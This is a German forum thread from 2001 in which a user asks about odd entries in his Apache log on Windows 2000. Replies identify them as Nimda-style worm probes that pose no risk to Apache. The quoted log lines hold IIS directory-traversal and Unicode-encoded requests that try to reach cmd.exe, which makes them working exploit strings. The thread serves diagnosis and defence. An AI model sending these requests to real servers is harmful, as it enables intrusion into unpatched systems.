Hackerboard Wiki HaboBlog
Hackerboard bei Facebook Hackerboard bei Google+ Hackerboard bei Twitter

[HaBo]

 
(In)security allgemein Sicherheit, Anonymität im Netz. Schutz und Maßnahmen. Prävention und Konzepte. Sicherheitsarchitekturen allgemein und auf der Netzwerkebene.

Apache Webserver Logdatei

Diskussion: Apache Webserver Logdatei im Forum (In)security allgemein, in der Kategorie Security Area; Anzeige Hi Leute, Ich hab seit ein paar Tagen bei mir einen Webserver (Apache) unter Win200 laufen, und hab mir ...

Antwort
Alt 18.12.01, 19:07   #1 (permalink)
 
Registriert seit: 25.10.01
niedriger noob Leistung: Facit NTK
Likes: 0
Standard Apache Webserver Logdatei

Anzeige

Hi Leute,
Ich hab seit ein paar Tagen bei mir einen Webserver (Apache) unter Win200 laufen, und hab mir mal die Logdatei angeschaut. Bis auf einige Ausnahmen stehen auch ganz normale Sachen drinnen, wie z.B.
192.168.0.2 - - [18/Dec/2001:00:56:44 +0100] "GET /BIO/Ernaehrung/spurel.html HTTP/1.1" 200 1476

Aber dazwischen findet sich immer wieder:
62.107.27.236 - - [18/Dec/2001:16:53:13 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
62.107.27.236 - - [18/Dec/2001:16:53:13 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307

Mich würde interressieren, was derjenige mit solchen Anfragen bezweckt? Gibt´s da irgendein Sicherheitsloch von dem ich wisen sollte?

thx im Vorraus
Noob

P.S.: Win2000 hat das neueste Service Pack, Apache Version ist 1.3.22

niedriger noob ist offline   Mit Zitat antworten
Alt 18.12.01, 19:10   #2 (permalink)
Member of Honour
 
Registriert seit: 02.10.01
Indi Leistung: Z3
Likes: 0
Standard

Nur mal so eine Idee:

62.107.27.236 ist nicht zufällig deine IP oder?
Indi ist offline   Mit Zitat antworten
   
HaBOT
 
- Anzeige -

Werbung ist gerade online    
Alt 18.12.01, 19:24   #3 (permalink)
Themenstarter
 
Registriert seit: 25.10.01
niedriger noob Leistung: Facit NTK
Likes: 0
Standard

Nein, meine ist 62.47.bla.bla
niedriger noob ist offline   Mit Zitat antworten
Alt 18.12.01, 21:28   #4 (permalink)
Member of Honour
 
Registriert seit: 20.10.01
boppy Leistung: Facit NTK
boppy eine Nachricht über ICQ schicken
Likes: 0
Standard

Ach, da solltest du dir echt keine sorgen machen. Diese attacken füllen knapp 80% meines LogFiles. Es muss sich um einen Virus handeln, der sowas versucht, denn es sind teilweise 4 Leute in der gleichen Sekunde dabei! Also: No Panic - if no M$! ) Nix neues also *fg*
boppy ist offline   Mit Zitat antworten
Alt 18.12.01, 22:07   #5 (permalink)
Themenstarter
 
Registriert seit: 25.10.01
niedriger noob Leistung: Facit NTK
Likes: 0
Standard

big tthhxx für die schnelle Hilfe.
War gut, dass ich diesmal nicht M$ Progs eingesetzt habe :] .
Gibt´s eine Liste, auf der ich nachsehen kann, für welche Exploits mein System noch anfällig ist?

mfg
Noob
niedriger noob ist offline   Mit Zitat antworten
Alt 18.12.01, 22:09   #6 (permalink)
Moderator
 
Registriert seit: 17.10.01
soox Leistung: Facit NTK
Likes: 0
Standard

nimda und co lassen grüssen...in meinen log-files befindet sich ca 80% solche sch***
soox ist offline   Mit Zitat antworten
Alt 19.12.01, 22:14   #7 (permalink)
Themenstarter
 
Registriert seit: 25.10.01
niedriger noob Leistung: Facit NTK
Likes: 0
Standard

Danke für die super Links, genau sowas habe ich gesucht
niedriger noob ist offline   Mit Zitat antworten
Antwort
   
- Anzeige -

Werbung ist gerade online    

[HaBo] » Security Area » (In)security allgemein » Apache Webserver Logdatei
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
APACHE Webserver Traffic und Bandbreite begrenzen ba2 Webmaster-Security 11 07.12.07 04:00
Webserver für PHP Stein Code Kitchen 17 15.03.07 14:21
Webserver Easyrider Network · LAN, WAN, Firewalls 3 03.08.06 15:29
Apache dominiert Webserver non News & Ankündigungen 0 06.08.05 10:20
Apache Webserver... keymaker Windows 4 05.04.04 21:31


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61